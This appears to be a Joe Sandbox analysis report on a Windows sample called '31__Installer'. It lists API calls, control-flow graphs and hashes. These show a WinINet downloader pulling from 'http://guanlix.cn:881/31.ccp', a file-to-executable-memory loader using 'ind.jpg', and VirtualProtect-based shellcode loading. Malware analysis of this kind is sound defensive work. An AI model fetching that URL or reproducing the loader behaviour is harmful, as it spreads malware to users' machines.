                    • Opcode Fuzzy Hash: 9129fa001ae7cb9a9e449da07c5b4552e20c13dcffa7c27bd578de3a5fde6620
                    • Instruction Fuzzy Hash: AD11B4736002187FE72257F66C49FBB7AACDF86770F110526FA05D21A0D9A45C00C6B5

                    Control-flow Graph

                    APIs
                    • __EH_prolog.LIBCMT ref: 003E2E42
                    • InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 003E2E5E
                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 003E2E7B
                    • InternetCloseHandle.WININET(?), ref: 003E2F0F
                      • Part of subcall function 003E2D13: __EH_prolog.LIBCMT ref: 003E2D18
                    • InternetReadFile.WININET(?,?,00001000,?), ref: 003E2EE1
                    • InternetCloseHandle.WININET(?), ref: 003E2EF7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: Internet$CloseH_prologHandleOpen$FileRead
                    • String ID: Download
                    • API String ID: 2208602198-2171396134
                    • Opcode ID: cc5ce7350fdabb6c54d298e593daa8550817490fa27907306dfae096143f9a30
                    • Instruction ID: aa5b63c0f53fc9115369c9925386374f2a3b0bec72ff4ab52619a828516f5aa0
                    • Opcode Fuzzy Hash: cc5ce7350fdabb6c54d298e593daa8550817490fa27907306dfae096143f9a30
                    • Instruction Fuzzy Hash: ED21077190016AEEEF229BA5CC85FFFBB7CFB44354F10026AB615B6191D7705E84CA60

                    Control-flow Graph

                    APIs
                    • __EH_prolog.LIBCMT ref: 003E2E42
                    • InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 003E2E5E
                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 003E2E7B
                    • InternetCloseHandle.WININET(?), ref: 003E2F0F
                      • Part of subcall function 003E2D13: __EH_prolog.LIBCMT ref: 003E2D18
                    • InternetReadFile.WININET(?,?,00001000,?), ref: 003E2EE1
                    • InternetCloseHandle.WININET(?), ref: 003E2EF7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: Internet$CloseH_prologHandleOpen$FileRead
                    • String ID: Download
                    • API String ID: 2208602198-2171396134
                    • Opcode ID: 85e0e1c085c2ff7f50010a827a411439e79386e6a6ecabd344ea70bb7c11a141
                    • Instruction ID: 0ad24c5e498228a5182fd22fb4b892713f6bc98fd7a5214afa9c09dba61596a7
                    • Opcode Fuzzy Hash: 85e0e1c085c2ff7f50010a827a411439e79386e6a6ecabd344ea70bb7c11a141
                    • Instruction Fuzzy Hash: A111FC75900169EFEB229B95CC85FFEBB7CEB48354F10026AB605B61D1C7705E44CA60

                    Control-flow Graph

                    APIs
                    • LoadLibraryA.KERNEL32(?,00000000,00000002,?,02F9FCB5,00000000), ref: 02F9FFF5
                    • VirtualProtect.KERNEL32(00000000,0000000C,00000040,?,?,02F9FCB5,00000000), ref: 02FA0035
                    • VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 02FA0068
                    • VirtualProtect.KERNEL32(00000000,004014A4,00000040,?), ref: 02FA0093
                    • VirtualProtect.KERNEL32(00000000,004014A4,?,?), ref: 02FA00BD
                    Memory Dump Source
                    • Source File: 00000000.00000002.3819296755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2f90000_31__Installer.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProtectVirtual$LibraryLoad
                    • String ID:
                    • API String ID: 895956442-0
                    • Opcode ID: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
                    • Instruction ID: 8996282749396dc4f0aabc5bed4e49d75b2ba13970d391f932207adc2f6038c1
                    • Opcode Fuzzy Hash: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
                    • Instruction Fuzzy Hash: 0D21AFF260530A7FD3209A649C99F7B77ECEF84746F04483EBB46D2550EF64E5088A60

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 75 3e2964-3e2976 call 3e4948 78 3e297c-3e2986 75->78 79 3e2978-3e297a 75->79 81 3e2988-3e2991 78->81 82 3e29b4-3e29b7 78->82 80 3e29a4-3e29b1 79->80 81->82 83 3e2993-3e299f 81->83 84 3e29b9-3e29c3 call 3e1986 82->84 85 3e29d4-3e29d7 82->85 86 3e29a1 83->86 90 3e29d9-3e29f5 call 3e2512 84->90 91 3e29c5-3e29c9 call 3e1fca 84->91 88 3e29a3 85->88 86->88 88->80 96 3e29f8-3e29ff 90->96 94 3e29ce-3e29d2 91->94 94->85 94->86 97 3e2a8c-3e2a8f 96->97 98 3e2a05-3e2a08 96->98 99 3e2a0a-3e2a2d 97->99 98->99 101 3e2a2f-3e2a32 99->101 102 3e2aaa 99->102 103 3e2a94-3e2a97 101->103 104 3e2a34-3e2a3b 101->104 105 3e2aad-3e2abb call 3e1c12 102->105 103->102 106 3e2a99-3e2aa8 call 3e1fca 103->106 107 3e2a3d 104->107 108 3e2a40-3e2a45 104->108 105->88 106->102 118 3e2ac0-3e2ac3 106->118 107->108 111 3e2a66-3e2a70 108->111 112 3e2a47-3e2a4e 108->112 117 3e2a72-3e2a74 111->117 111->118 115 3e2a53-3e2a64 call 3e566a 112->115 116 3e2a50 112->116 115->102 115->111 116->115 117->96 120 3e2a76-3e2a7a 117->120 118->105 120->102 121 3e2a7c-3e2a87 call 3e2408 120->121 121->96
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: Fputc$H_prolog
                    • String ID:
                    • API String ID: 1896196775-3916222277
                    • Opcode ID: 2aeda205b46232bdffd482e0606d86d76d8b906a7ed6fdf26bf36797777554db
                    • Instruction ID: e1196e1c74451b4257ce835c077a44ea124d09794912932c1f9a8c060ad99ade
                    • Opcode Fuzzy Hash: 2aeda205b46232bdffd482e0606d86d76d8b906a7ed6fdf26bf36797777554db
                    • Instruction Fuzzy Hash: 87419F319016A9DFCF26CB96C940AAFB7F9BF58310F21072AF442A76C1DB71A944CB51

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 125 2fa00cd-2fa00e2 127 2fa00ea-2fa00fb 125->127 128 2fa00e4-2fa00e5 125->128 131 2fa01ab 127->131 132 2fa0101-2fa010c 127->132 129 2fa01af-2fa01b2 128->129 133 2fa01ad-2fa01ae 131->133 132->131 134 2fa0112-2fa0120 VirtualProtect 132->134 133->129 134->131 135 2fa0126-2fa0160 call 2fa161e call 2fa18bb VirtualProtect 134->135 135->131 141 2fa0162-2fa016e 135->141 141->131 142 2fa0170-2fa017e VirtualProtect 141->142 142->131 143 2fa0180-2fa01a9 call 2fa161e call 2fa18bb VirtualProtect 142->143 143->133
                    APIs
                    • VirtualProtect.KERNEL32(00000000,000016CC,00000040,?), ref: 02FA011B
                    • VirtualProtect.KERNEL32(00000000,000016CC,?,?), ref: 02FA014E
                    • VirtualProtect.KERNEL32(00000000,00402AD1,00000040,?), ref: 02FA0179
                    • VirtualProtect.KERNEL32(00000000,00402AD1,?,?), ref: 02FA01A3
                    Memory Dump Source
                    • Source File: 00000000.00000002.3819296755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2f90000_31__Installer.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
                    • Instruction ID: e79b56432533bd26ee309828861b4d28eb68591973aade877d693839bc6d5f25
                    • Opcode Fuzzy Hash: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
                    • Instruction Fuzzy Hash: 212192B26147496FF3209A65DC98F7B77ECDB88340F44083EBB87D2541EF64E4058A60

                    Control-flow Graph

                    APIs
                      • Part of subcall function 003E1186: __time64.LIBCMT ref: 003E118E
                      • Part of subcall function 003E1186: _rand.LIBCMT ref: 003E119E
                      • Part of subcall function 003E1186: _rand.LIBCMT ref: 003E11AD
                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 003E2F33
                      • Part of subcall function 003E2E3D: __EH_prolog.LIBCMT ref: 003E2E42
                      • Part of subcall function 003E2E3D: InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 003E2E5E
                      • Part of subcall function 003E2E3D: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 003E2E7B
                      • Part of subcall function 003E2E3D: InternetReadFile.WININET(?,?,00001000,?), ref: 003E2EE1
                      • Part of subcall function 003E2E3D: InternetCloseHandle.WININET(?), ref: 003E2EF7
                      • Part of subcall function 003E2E3D: InternetCloseHandle.WININET(?), ref: 003E2F0F
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 003E2F54
                      • Part of subcall function 003E168B: _wprintf.LIBCMT ref: 003E169D
                      • Part of subcall function 003E168B: _wprintf.LIBCMT ref: 003E16B5
                      • Part of subcall function 003E168B: _wprintf.LIBCMT ref: 003E16CA
                      • Part of subcall function 003E11E1: GetTickCount64.KERNEL32 ref: 003E11EF
                      • Part of subcall function 003E11E1: Sleep.KERNEL32(0000012C), ref: 003E11F9
                      • Part of subcall function 003E11E1: GetTickCount64.KERNEL32 ref: 003E11FF
                      • Part of subcall function 003E11E1: CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.jpg,80000000,00000001,00000000,00000004,00000080,00000000), ref: 003E1244
                      • Part of subcall function 003E11E1: GetFileSize.KERNEL32(00000000,00000000), ref: 003E124E
                      • Part of subcall function 003E11E1: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 003E125F
                      • Part of subcall function 003E11E1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003E1270
                      • Part of subcall function 003E11E1: CloseHandle.KERNEL32(00000000), ref: 003E1277
                    Strings
                    • http://guanlix.cn:881/31.ccp, xrefs: 003E2F3E
                    • C:\Users\Public\Downloads\ind.jpg, xrefs: 003E2F39
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: Internet$File$CloseHandleVirtual_wprintf$AllocCount64OpenReadTick_rand$CreateFreeH_prologSizeSleep__time64
                    • String ID: C:\Users\Public\Downloads\ind.jpg$http://guanlix.cn:881/31.ccp
                    • API String ID: 1108426195-1162759939
                    • Opcode ID: 4450c629c59c6dfc00457764a5dad1144584269356b2c9ba36a59ae04490f5dc
                    • Instruction ID: 91353c9b92baabdcc0c7330bffa6fdcd5820aad0df335480e5568d9f2b9117f8
                    • Opcode Fuzzy Hash: 4450c629c59c6dfc00457764a5dad1144584269356b2c9ba36a59ae04490f5dc
                    • Instruction Fuzzy Hash: 42E012712442B07AF66773B16C0BFEB16189B00751F214512F7009D0D1DDE46941C669

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 157 2f9fb37-2f9fb76 call 2fa1628 * 2 162 2f9fb7c-2f9fb7e 157->162 163 2f9fd91 157->163 162->163 165 2f9fb84-2f9fb95 VirtualAlloc 162->165 164 2f9fd94-2f9fd9b 163->164 165->163 166 2f9fb9b-2f9fbe9 call 2fa18bb call 2fa18df call 2fa17ba call 2fa1695 165->166 175 2f9fbef-2f9fbf5 166->175 176 2f9fd3e-2f9fd4a 166->176 175->176 177 2f9fbfb-2f9fc15 call 2fa1628 175->177 178 2f9fd7a-2f9fd8f call 2fa18df 176->178 179 2f9fd4c-2f9fd54 176->179 177->163 186 2f9fc1b-2f9fc23 177->186 178->164 179->178 182 2f9fd56-2f9fd73 call 2fa18df 179->182 182->178 189 2f9fc3b-2f9fc41 186->189 190 2f9fc25 186->190 193 2f9fc43-2f9fc46 189->193 194 2f9fc77-2f9fc82 189->194 192 2f9fc2b-2f9fc39 LoadLibraryA 190->192 192->189 192->192 197 2f9fc49-2f9fc62 call 2fa1628 193->197 195 2f9fc99-2f9fca2 194->195 196 2f9fc84-2f9fc8d call 2fa01b3 194->196 199 2f9fca4 195->199 200 2f9fca6-2f9fcad 195->200 208 2f9fd3a 196->208 209 2f9fc93 196->209 197->208 211 2f9fc68-2f9fc75 197->211 199->200 203 2f9fcaf-2f9fcb8 call 2f9ffe7 200->203 204 2f9fcd5-2f9fcd8 200->204 218 2f9fcba-2f9fcc0 203->218 219 2f9fcc2-2f9fcc3 call 2fa00cd 203->219 206 2f9fcda-2f9fcdd 204->206 207 2f9fd33-2f9fd34 call 2fa0eca 204->207 206->207 212 2f9fcdf-2f9fce2 206->212 217 2f9fd39 207->217 208->176 209->195 211->194 211->197 215 2f9fce4-2f9fce6 212->215 216 2f9fd07-2f9fd16 call 2fa09f9 212->216 215->216 220 2f9fce8-2f9fceb 215->220 227 2f9fd18-2f9fd1e call 2fa0c04 216->227 228 2f9fd25-2f9fd31 call 2fa058d 216->228 217->208 218->208 218->219 225 2f9fcc8-2f9fccb 219->225 223 2f9fced-2f9fcf0 220->223 224 2f9fcff-2f9fd05 call 2fa1351 220->224 223->224 229 2f9fcf2-2f9fcf5 223->229 224->217 225->204 231 2f9fccd-2f9fcd3 225->231 236 2f9fd23-2f9fd24 227->236 228->217 229->208 234 2f9fcf7-2f9fcfd call 2fa14e2 229->234 231->204 231->208 234->217 236->228
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02F9FB8F
                    • LoadLibraryA.KERNEL32(00000238), ref: 02F9FC2C
                    Memory Dump Source
                    • Source File: 00000000.00000002.3819296755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2f90000_31__Installer.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocLibraryLoadVirtual
                    • String ID:
                    • API String ID: 3550616410-0
                    • Opcode ID: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
                    • Instruction ID: bc6210992e627c1b0f640fc3387eba4c03cc92839aca1e5b08ff1a1cb3e45ae2
                    • Opcode Fuzzy Hash: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
                    • Instruction Fuzzy Hash: D161E372901B06ABEF315A68CC90F9BB3EAFF05398F140A1AE75A85940D731F155CF51

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 240 3e5902-3e591e call 3ea940 243 3e5935-3e5939 240->243 244 3e5920-3e5933 call 3ea8eb call 3ea899 240->244 245 3e593b 243->245 246 3e5948-3e5954 call 3e50e4 call 3e5895 243->246 251 3e5942-3e5947 call 3ea985 244->251 248 3e593f 245->248 258 3e5959-3e5969 call 3e596e 246->258 248->251 258->248
                    APIs
                      • Part of subcall function 003EA8EB: __getptd_noexit.LIBCMT ref: 003EA8EB
                    • __lock_file.LIBCMT ref: 003E5949
                      • Part of subcall function 003E50E4: __lock.LIBCMT ref: 003E5109
                    • __fclose_nolock.LIBCMT ref: 003E5954
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    • Opcode ID: 121e443a4353b667bdaceebb9451c143ecab2b4438bcfadc00dfe0e7145b2611
                    • Instruction ID: ab30a30c18d9660e7fad848df10d405633a23f7ae17bb484dbf3bc5ee1e1049f
                    • Opcode Fuzzy Hash: 121e443a4353b667bdaceebb9451c143ecab2b4438bcfadc00dfe0e7145b2611
                    • Instruction Fuzzy Hash: D5F09630801FB9DADB13AB7688467EE7BA06F01339F258305F435AE1D2C77C5D019A56

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 598 54675e0-54675eb 599 5467615-5467634 call 5466f64 598->599 600 54675ed-5467614 call 5465ebc 598->600 606 5467636-5467639 599->606 607 546763a-5467699 599->607 614 546769f-546772c GlobalMemoryStatusEx 607->614 615 546769b-546769e 607->615 619 5467735-546775d 614->619 620 546772e-5467734 614->620 620->619
                    Memory Dump Source
                    • Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d71043936b631f00eb95faf575370b20b6c0653bc6d9813c7faf95eaab74d5af
                    • Instruction ID: 4721e104eafd0775cf57e6eaf8ebcdfe9a8e426526d662dfa2eb92d44c549efc
                    • Opcode Fuzzy Hash: d71043936b631f00eb95faf575370b20b6c0653bc6d9813c7faf95eaab74d5af
                    • Instruction Fuzzy Hash: 4741F231D0434A8BCB14DFAAD8447DABBF5EF89220F14856AD409A7340DB789881CBD1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 623 3e1830-3e1843 624 3e18ee-3e18f6 623->624 625 3e1849 623->625 626 3e184b-3e184e 625->626 627 3e1854-3e1856 625->627 626->624 626->627 628 3e185a-3e185f 627->628 629 3e1866-3e186d 628->629 630 3e1861-3e1864 628->630 631 3e186f 629->631 632 3e18b0-3e18bb call 3e2964 629->632 630->629 633 3e1875-3e1878 631->633 634 3e1871-3e1873 631->634 637 3e18be-3e18c1 632->637 635 3e187a 633->635 636 3e1887-3e18ae call 3e3dd0 633->636 634->632 634->633 638 3e187c-3e187f 635->638 639 3e1881-3e1884 635->639 644 3e18d6-3e18da 636->644 641 3e18ec-3e18ed 637->641 642 3e18c3-3e18d2 637->642 638->636 638->639 639->636 641->624 642->644 645 3e1858 644->645 646 3e18e0 644->646 645->628 646->641 647 3e18e2-3e18e6 646->647 647->641 647->645
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: b31e1f9b03b365c2f3d260a60de42dfc28d177028125769d53eafa99e593f33c
                    • Instruction ID: 8344e04f912839286dbaea72a2cfb8f0712e8fb3d6f822f0cf474706828e6e1b
                    • Opcode Fuzzy Hash: b31e1f9b03b365c2f3d260a60de42dfc28d177028125769d53eafa99e593f33c
                    • Instruction Fuzzy Hash: 5D313C759002A9EFCB52CF5AC88459D77B4FF05364F14836AE8248B191D3709E50CF81
                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05467632), ref: 0546771F
                    Memory Dump Source
                    • Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd
                    Similarity
                    • API ID: GlobalMemoryStatus
                    • String ID:
                    • API String ID: 1890195054-0
                    • Opcode ID: 0d4a3b77cd75d55d17bfc073a4ec5afa301f29073c9480ec8871d726b4c80b23
                    • Instruction ID: 0f6e6ec8dcbbcbc78186437cdd0d32306179afbefc0c50ba189db6f7bc3ba95d
                    • Opcode Fuzzy Hash: 0d4a3b77cd75d55d17bfc073a4ec5afa301f29073c9480ec8871d726b4c80b23
                    • Instruction Fuzzy Hash: E6211571C0465A9FCB10DFAAD444BDEFBF4EB48624F15816AD818A7240D378A9448FA2
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: d47b2aba60c88302d93b92d667a2981f5dd996becaf098e873be582f41e7fa1c
                    • Instruction ID: 2626a25b3e38deb3a4dca87769e670d5b5db13bf2ef261f58838c772de717b08
                    • Opcode Fuzzy Hash: d47b2aba60c88302d93b92d667a2981f5dd996becaf098e873be582f41e7fa1c
                    • Instruction Fuzzy Hash: CE116DB5610258AFDB12DF8AC885AAFF7ECFF54344B00451EF552AB281C3B09D01CB60
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 9881b6aeff50cce0562cf9cb9c7315f958a8aba2477b941a501b337196116aed
                    • Instruction ID: a86d7b201a7b420da801ef489a457c3f0b037d99b8463cde092321bcca6e863e
                    • Opcode Fuzzy Hash: 9881b6aeff50cce0562cf9cb9c7315f958a8aba2477b941a501b337196116aed
                    • Instruction Fuzzy Hash: 5D116DB5610258AFDB12DF8AC885AAFF7ECFB54344B00451EF552AB281C3B09D01CB60
                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05467632), ref: 0546771F
                    Memory Dump Source
                    • Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd
                    Similarity
                    • API ID: GlobalMemoryStatus
                    • String ID:
                    • API String ID: 1890195054-0
                    • Opcode ID: 3981c1bbf3177377ef56de5805accb92f11aefb3d7fa415df9d8b46a97964ffc
                    • Instruction ID: ec32651ea26f59b9ee9c315129728f0c04a6853c00b3af0de39be8503d8e0200
                    • Opcode Fuzzy Hash: 3981c1bbf3177377ef56de5805accb92f11aefb3d7fa415df9d8b46a97964ffc
                    • Instruction Fuzzy Hash: C41144B1C0065A9BCB10CFAAC4447DEFBF4FF48220F14812AD818B7640D7B8A940CFA1
                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05467632), ref: 0546771F
                    Memory Dump Source
                    • Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd
                    Similarity
                    • API ID: GlobalMemoryStatus
                    • String ID:
                    • API String ID: 1890195054-0
                    • Opcode ID: 618a65fee4f61b0aaf868ae65724b5f0018be0e55b910a1d36a8de38f8708cc7
                    • Instruction ID: f69bea27d311674d64264d8e8e9eccf8bc0b589a33f0fab2756325daa64dab46
                    • Opcode Fuzzy Hash: 618a65fee4f61b0aaf868ae65724b5f0018be0e55b910a1d36a8de38f8708cc7
                    • Instruction Fuzzy Hash: 691133B1C0465A9BCB10CFAAC4447DEFBF4EB48620F10812AE918A7240D378A940CFE1
                    APIs
                    • __EH_prolog.LIBCMT ref: 003E246D
                      • Part of subcall function 003E130B: std::locale::facet::_Incref.LIBCPMT ref: 003E131E
                      • Part of subcall function 003E2344: __EH_prolog.LIBCMT ref: 003E2349
                      • Part of subcall function 003E2344: std::_Lockit::_Lockit.LIBCPMT ref: 003E2358
                      • Part of subcall function 003E2344: int.LIBCPMT ref: 003E236F
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd
                    Similarity
                    • API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
                    • String ID:
                    • API String ID: 3551698239-0
                    • Opcode ID: 2d5285a6f7b0454f63ad014ddca2fc5967f2237b946529e9e2b63b75815453c0
                    • Instruction ID: 21c62721c7ed326823eb534c2d4b15ed6ec629a0fbd369aa7ee8d96f711b19d9
                    • Opcode Fuzzy Hash: 2d5285a6f7b0454f63ad014ddca2fc5967f2237b946529e9e2b63b75815453c0
                    • Instruction Fuzzy Hash: FFF096716001F4ABDF17EF16CC02B9F339D6B14700F004619F406D61C1DFB499108B50
                    APIs
                    • __EH_prolog.LIBCMT ref: 003E246D
                      • Part of subcall function 003E130B: std::locale::facet::_Incref.LIBCPMT ref: 003E131E
                      • Part of subcall function 003E2344: __EH_prolog.LIBCMT ref: 003E2349
                      • Part of subcall function 003E2344: std::_Lockit::_Lockit.LIBCPMT ref: 003E2358
                      • Part of subcall function 003E2344: int.LIBCPMT ref: 003E236F
                    Memory Dump Source
                    • Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
